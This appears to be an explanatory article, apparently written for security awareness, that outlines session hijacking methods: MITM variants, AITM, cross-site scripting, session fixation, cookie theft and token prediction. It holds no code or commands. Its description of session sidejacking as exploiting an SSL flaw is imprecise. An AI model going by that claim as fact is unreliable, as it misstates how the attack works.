There are many ways in which a malicious actor can carry out a successful session hijacking attack. Broadly speaking, they can be categorized as either an active or passive attack. Another way to think about session hijacking methods is stealing a valid session token vs. faking a valid session token. Stealing usually involves intercepting user traffic, while faking requires the attacker to spoof a valid token or force a client to use a predetermined token.
Passive Attacks
Passive attacks use various server and browser exploits to monitor client activity in order to gather data, including a session token.
Active Attacks
In an active attack, the cybercriminal might use phishing or malware to obtain a session token and even alter web page content.
Let’s take a look at several specific methods that can be used to carry out a session hijacking attack.
Man-in-the-Middle (MITM) Attacks
Type: Passive Attack
Cybercriminals can use man-in-the-middle (MITM) attacks to intercept a session token. The attacker may use a compromised network device or unsafe Wi-Fi connection to place themself between the target and the web server. From there they monitor the target’s network traffic, waiting for them to log in to a secured account. This exposes the user’s authenticated session token; the attacker then steals it and gains access to the account on their own web browser.
There are multiple types of MITM attacks that malicious actors can use to execute session hijacking, including:
- IP Spoofing: The attacker uses modified Internet Protocol (IP) packets to pose as an authenticated client or server.
- Session Sidejacking: The attacker exploits a vulnerability found in a website’s SSL (Secure Sockets Layer) encryption to expose and steal session tokens.
- DNS Spoofing: The attacker exploits the caching process of a web server’s Domain Name System (DNS) by replacing the stored IP address of a trusted website with an address that leads to an unsafe server they control.
Adversary-in-the-Middle (AITM) Attacks
Type: Active Attack
Adversary-in-the-middle (AITM) attacks can be thought of as an evolution of MITM. While this attack initially takes the same approach to stealing session tokens – by eavesdropping on network traffic – the attacker then becomes active by manipulating the data being passed between user and server. This might include injecting malware into data the user receives, which can in turn grant them access to even more secure data.
Cross-Site Scripting (XSS)
Type: Active Attack
Cross-site scripting takes advantage of web application vulnerabilities to send malicious browser side scripts to unsuspecting users. The attacker can inject the script into a trusted website, which then relays that script to the user. The target’s browser sees the script as coming from a trusted source and so has no defenses against it. The malicious script then accesses the target’s session token and returns it to the attacker, who can use it to gain control of the target’s account. This type of attack is particularly prevalent, as it can be used on any web application that incorporates user input into its output data.
Session Fixation
Type: Active Attack
Rather than steal a client’s session token, session fixation gains access to an account by forcing the target to use a token that is already known to the attacker. This is done via a simple phishing scam. The cybercriminal sends the client a link to the target web server that already contains the chosen token (typically in the URL). When the client logs in using that link, their session token becomes the one chosen by the attacker. By visiting that same URL, the attacker now has access to the target’s account.
This can be done even if the web server uses server-generated session tokens. The attacker simply visits the web server to generate an ID, then sends the client a link containing that same session token in the URL. Once the client has logged in, the attacker gains access.
Cookie Theft
Type: Active Attack
Cookie theft uses phishing and malware to steal a client’s session token once they have logged into a secured web server.
Session Token Prediction
Type: Active Attack
In this type of session hijacking attack, the cybercriminal does not need to steal an authenticated session token. Instead, they gain access by predicting what a valid token will look like.
Web applications that generate session tokens pull from a specific set of data to create the token, sometimes using predictable information such as the client username or IP address. For example, a session token string might include a variable like “client501” that is altered sequentially for each new token generated. By monitoring this activity, the attacker can understand the session token structure and pair this information with machine learning to predict what a valid ID from the web server will look like (e.g., “client502” and so on). From there it’s only a matter of trying possible IDs until one is successful.